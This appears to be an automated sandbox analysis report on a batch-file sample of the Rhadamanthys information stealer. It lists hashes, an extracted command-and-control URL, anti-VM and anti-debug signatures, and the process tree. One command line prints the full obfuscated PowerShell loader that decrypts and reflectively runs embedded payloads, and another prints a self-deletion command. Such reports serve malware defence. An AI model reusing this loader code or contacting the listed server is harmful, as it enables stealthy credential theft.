Analysis
max time kernel: 52s
max time network: 131s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64 arch:x86 image:win10v2004-20230220-en locale:en-us os:windows10-2004-x64 system
submitted: 19/04/2023, 16:07
Static task: static1
Behavioral task: behavioral1
Sample: 10FpDvByrqvHWUgFegBMjMmEkh.bat
Resource: win7-20230220-en
Behavioral task: behavioral2
Sample: 10FpDvByrqvHWUgFegBMjMmEkh.bat
Resource: win10v2004-20230220-en
General
Target: 10FpDvByrqvHWUgFegBMjMmEkh.bat
Size: 189KB
MD5: 98b57df374d3888660dca7b8707aa9e5
SHA1: 4afb4626817228104bd752ba38650cef356e9afc
SHA256: 23f45fe1261dd687ee376dc36555a98b72ab76c70a330d8bd33e2bfa1d41aeb1
SHA512: a21e4b1af9ddc7731356109bc1f2f75615db963e34666216c46e7b14bf28ac7f7c8432c060a2b67335111cf434cefa90de0e79e9b7c54a996c38d1fc79f26931
SSDEEP: 3072:jJ6sy+qsWPFiC5x1ElXP6RxLVYJdq7GOngOIxKtQPula2Mjr/L7pcTDlXMW5aOcT:hYs21xCIjLquDlIx91n/LCTDlXXHW
Malware Config
Extracted
rhadamanthys
http://185.224.129.51:8080/modlib/o6u3ke.661c
Signatures
-
Detect rhadamanthys stealer shellcode 3 IoCs
resource | yara_rule
behavioral2/memory/452-193-0x0000000006AC0000-0x0000000006ADC000-memory.dmp | family_rhadamanthys
behavioral2/memory/452-195-0x0000000006AC0000-0x0000000006ADC000-memory.dmp | family_rhadamanthys
behavioral2/memory/452-198-0x0000000006AC0000-0x0000000006ADC000-memory.dmp | family_rhadamanthys
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Enumerates VirtualBox registry keys 2 TTPs 5 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__ | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__ | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Executes dropped EXE 1 IoCs
pid | Process
452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid | Process
452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description | ioc | Process
File opened (read-only) | \??\VBoxMiniRdrDN | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid | Process
3664 | powershell.exe (2 entries)
452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe (2 entries)
952 | powershell.exe (4 entries)
452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe (20 entries)
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3664 | powershell.exe
Token: SeDebugPrivilege | 452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Token: SeDebugPrivilege | 952 | powershell.exe
Token: SeShutdownPrivilege | 452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
Token: SeCreatePagefilePrivilege | 452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe
-
Suspicious use of WriteProcessMemory 8 IoCs
description | pid | Process | procid_target
PID 4464 wrote to memory of 3664 | 4464 | cmd.exe | 84
PID 4464 wrote to memory of 3664 | 4464 | cmd.exe | 84
PID 4464 wrote to memory of 452 | 4464 | cmd.exe | 85
PID 4464 wrote to memory of 452 | 4464 | cmd.exe | 85
PID 4464 wrote to memory of 452 | 4464 | cmd.exe | 85
PID 452 wrote to memory of 952 | 452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe | 89
PID 452 wrote to memory of 952 | 452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe | 89
PID 452 wrote to memory of 952 | 452 | 10FpDvByrqvHWUgFegBMjMmEkh.bat.exe | 89
Processes
-
C:\Windows\system32\cmd.exe (depth 1)
Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat"
- Suspicious use of WriteProcessMemory
PID: 4464
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
Command line: powershell -w hidden -c #
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3664
-
C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\10FpDvByrqvHWUgFegBMjMmEkh.bat.exe" function Dr($f){$f.Replace('AXQs', '')}$ezXk=Dr 'GeAXQstAXQsCuAXQsrAXQsrentAXQsPrAXQsocAXQsessAXQs';$Irdc=Dr 'ReAXQsadLiAXQsneAXQssAXQs';$GdQU=Dr 'InvAXQsokeAXQs';$oeNz=Dr 'FiAXQsrAXQssAXQstAXQs';$Skvh=Dr 'FAXQsromAXQsBasAXQse6AXQs4AXQsStrAXQsingAXQs';$Frss=Dr 'LoaAXQsdAXQs';$iCMB=Dr 'TAXQsrAXQsaAXQsnAXQssforAXQsmFAXQsinAXQsalAXQsBloAXQsckAXQs';$NIox=Dr 'CrAXQseaAXQstAXQseDeAXQscrAXQsyptAXQsorAXQs';$dXiP=Dr 'ChaAXQsngAXQseEAXQsxteAXQsnsiAXQsonAXQs';$Ethu=Dr 'EntrAXQsyAXQsPAXQsoAXQsinAXQstAXQs';function PiTFT($XOBWp,$PzVDp,$lwaqj){$zClni=[System.Security.Cryptography.Aes]::Create();$zClni.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zClni.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zClni.Key=[System.Convert]::$Skvh($PzVDp);$zClni.IV=[System.Convert]::$Skvh($lwaqj);$rFEvg=$zClni.$NIox();$WebjH=$rFEvg.$iCMB($XOBWp,0,$XOBWp.Length);$rFEvg.Dispose();$zClni.Dispose();$WebjH;}function WDCxf($XOBWp){$euCrm=New-Object System.IO.MemoryStream(,$XOBWp);$MDTEe=New-Object System.IO.MemoryStream;$wFbGM=New-Object System.IO.Compression.GZipStream($euCrm,[IO.Compression.CompressionMode]::Decompress);$wFbGM.CopyTo($MDTEe);$wFbGM.Dispose();$euCrm.Dispose();$MDTEe.Dispose();$MDTEe.ToArray();}function vGOdU($XOBWp,$PzVDp){[System.Reflection.Assembly]::$Frss([byte[]]$XOBWp).$Ethu.$GdQU($null,$PzVDp);}$ccWcY=[System.Linq.Enumerable]::$oeNz([System.IO.File]::$Irdc([System.IO.Path]::$dXiP([System.Diagnostics.Process]::$ezXk().MainModule.FileName, $null)));$lORZK = $ccWcY.Substring(3).Split('\');$xzfhv=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[0])) $lORZK[2] $lORZK[3]);$pmqpI=WDCxf (PiTFT ([Convert]::$Skvh($lORZK[1])) $lORZK[2] $lORZK[3]);vGOdU $pmqpI $null;vGOdU $xzfhv $null;
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks system information in the registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks for VirtualBox DLLs, possible anti-VM trick
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 452
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(452);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 952
-
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize: 53KB
MD5: 06ad34f9739c5159b4d92d702545bd49
SHA1: 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256: 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512: c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize: 64B
MD5: 3ca1082427d7b2cd417d7c0b7fd95e4e
SHA1: b0482ff5b58ffff4f5242d77330b064190f269d3
SHA256: 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512: bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize: 15KB
MD5: 14f535a89ae7a7ad8adc7ca3517bf190
SHA1: 9577803b11d41263e25d054b57f3a681d0ed55ef
SHA256: 14e0ee5b3045a935c30813215a6a8faaad1bb86e3305a50e4ae6d05ba49469ce
SHA512: 72f9c9823262d72377063e5058067b1b8bdf5c541732ea9ded243407e45201c08152f7c7bac0f2359a0e1c95e38b7e383efac9499cd14dd49db3ccf2c1648f67
-
Filesize: 423KB
MD5: c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1: f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256: 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512: 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize: 423KB
MD5: c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1: f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256: 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512: 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82